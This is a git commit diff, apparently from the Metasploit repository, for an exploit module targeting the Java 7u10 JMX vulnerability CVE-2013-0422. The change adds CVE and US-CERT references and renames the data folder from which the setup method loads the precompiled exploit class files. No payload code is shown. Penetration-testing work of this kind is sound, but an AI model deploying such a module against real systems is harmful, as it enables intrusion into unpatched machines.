module also updated with refs
parent
51f3f59d2f
commit
2c05af721c
|
@ -34,6 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'References' => [
|
||||
[ 'CVE', '2013-0422' ],
|
||||
[ 'US-CERT-VU', '625617' ],
|
||||
[ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],
|
||||
[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ]
|
||||
],
|
||||
|
@ -73,9 +75,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
def setup
|
||||
path = File.join(Msf::Config.install_root, "data", "exploits", "j7u10_jmx", "Exploit.class")
|
||||
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "Exploit.class")
|
||||
@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
|
||||
path = File.join(Msf::Config.install_root, "data", "exploits", "j7u10_jmx", "B.class")
|
||||
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "B.class")
|
||||
@loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
|
||||
|
||||
@exploit_class_name = rand_text_alpha("Exploit".length)
|
||||
|
|
Loading…
Reference in New Issue